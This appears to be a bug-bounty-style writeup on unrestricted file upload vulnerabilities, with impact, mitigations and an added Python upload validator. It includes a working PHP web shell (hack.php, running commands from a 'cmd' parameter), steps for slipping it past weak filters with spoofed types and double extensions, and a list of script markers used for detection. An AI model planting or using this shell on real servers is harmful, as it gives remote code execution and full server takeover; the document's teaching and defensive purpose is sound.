Description:
File upload functions are a favorite target for attackers, because they require your site to accept a large chunk of user-supplied data and write it to disk. This gives an attacker the opportunity to smuggle a malicious script onto your server. If they can then find a way to make the server execute that script, they can compromise the whole system.
An unrestricted file upload vulnerability is a common security issue in web applications. Whenever the web server accepts a file without validating its name, type, size and content, or without restricting where it is stored, the upload is considered unrestricted.
The impact depends on what the application does with the file afterwards: if the server stores it in a location from which it will be executed, a remote attacker can upload a file with malicious content and achieve remote code execution. The vulnerability can be exploited in many ways, including specially crafted multipart/form-data POST requests with a particular filename or MIME type chosen to get past weak filters.
The consequences include complete system compromise, an overloaded file system or database, pivoting of attacks to back-end systems, and simple defacement of the site.
PHP malicious script (a minimal web shell; it is deliberately dangerous, that is the point of the test):
<?php
// Run whatever is passed in the "cmd" parameter (GET or POST) on the server and return its output.
if (isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);
} else {
    echo "what is your idea ?";
}
?>
Save this as hack.php.
Steps to reproduce:
Step 1: Select a target that has file upload functionality (profile picture, document attachment, and so on).
Step 2: Create the malicious file hack.php and upload it. If the upload is refused, retry with variations that defeat weak filters: a different Content-Type for the multipart part (for example image/jpeg), or a double extension such as hack.php.jpg.
Step 3: Find where the file was stored (the response, the profile page or the image URL usually reveals the path) and request it with a cmd parameter, for example hack.php?cmd=id. If the command output comes back, the server executes uploaded files and the unrestricted file upload vulnerability is confirmed. If the file is accepted but served back as plain text, or is not reachable at all, the upload is still unrestricted but does not give code execution by itself.
Impact of file upload vulnerability:
Takeover of the victim's entire server through a server-side attack (remote code execution via the uploaded script).
If the storage path is built from the user-supplied filename, an attacker can write the file to an arbitrary location (path traversal) and overwrite existing critical files; a dropped .htaccess file, for example, can instruct the web server to execute other file types as scripts.
Injection of phishing pages hosted on the trusted domain, which discredits the web application.
File uploads may expose critical internal information in error messages, such as server-internal paths.
Mitigation:
Do not store uploaded files under the name the user supplied. If files keep their original names, the filename appears in the URL of the profile image when it is published, which tells the attacker exactly where to request their script.
Do not rely on file-type checking done in JavaScript. Client-side checks run in the attacker's browser and are bypassed by editing the request; every check must be repeated on the server.
Allow only an explicit list of file extensions (an allow-list, not a block-list), comparing the last extension in lower case.
Set a maximum file size and a maximum filename length.
Allow uploads only from authenticated, authorized users.
Make sure the content of the uploaded file is what its extension claims (check the magic bytes, or re-encode images), not only the extension or the client-supplied Content-Type.
Keep your website and its libraries updated.
Name the stored files randomly or by a hash, never from user input, and store them outside the web root or in a directory where script execution is disabled.
Block uploads from bots and scripts using a captcha.
Never display the server-side path of the uploaded file.
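A server-side validator that applies the checks above, added here as an example and not code from the original page: extension allow-list, magic-byte check of the content, size and name limits, a random storage name, exclusive-create writes, and storage in a directory chosen by the application rather than the user. It is written in Python so the logic reads as language-neutral; the allowed types, the limits and the script-marker scan are illustrative choices.

```python
import os
import secrets

# Allow-list: extension -> magic bytes the content must start with.
# Illustrative values; extend only with the types the application really needs.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_SIZE = 2 * 1024 * 1024   # 2 MiB
MAX_NAME_LEN = 100
# Script markers that never belong in an image: a cheap defense-in-depth check
# against polyglot files. Re-encoding the image with an image library is stronger.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    """Carries the reason for the server log; the user only gets a generic message."""


def validate_upload(original_name, data):
    """Run every server-side check; return (random_stored_name, ext) on success."""
    if any(c in original_name for c in ("/", "\\", "\x00")):
        raise UploadRejected("path separator or NUL in filename")
    if not 0 < len(original_name) <= MAX_NAME_LEN:
        raise UploadRejected("filename length")
    if not 0 < len(data) <= MAX_SIZE:
        raise UploadRejected("file size")
    if "." not in original_name:
        raise UploadRejected("no extension")
    ext = original_name.rsplit(".", 1)[1].lower()   # last extension only: hack.php.jpg -> jpg
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext}")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension")
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise UploadRejected("script marker inside file")
    # The stored name never derives from user input, so it cannot be guessed,
    # cannot traverse directories and cannot end in an executable extension.
    return secrets.token_hex(16) + "." + ext, ext


def save_upload(original_name, data, upload_dir):
    """Validate, then write with exclusive create into upload_dir, which must be
    outside the web root (or have script execution disabled). Files are served
    later by an application handler that sets Content-Type from the stored ext."""
    stored_name, _ = validate_upload(original_name, data)
    path = os.path.join(upload_dir, stored_name)
    with open(path, "xb") as f:   # "x": fail instead of overwriting an existing file
        f.write(data)
    return stored_name


if __name__ == "__main__":
    import tempfile
    d = tempfile.mkdtemp()
    print("stored as", save_upload("avatar.png", ALLOWED_TYPES["png"] + b"\x00" * 16, d))
    try:
        save_upload("hack.php", b"<?php system($_REQUEST['cmd']); ?>", d)
    except UploadRejected as e:
        print("rejected:", e)
```

The order of the checks is deliberate: the cheap name and size checks run first so an attacker cannot make the server inspect megabytes of content before rejecting an obviously bad name.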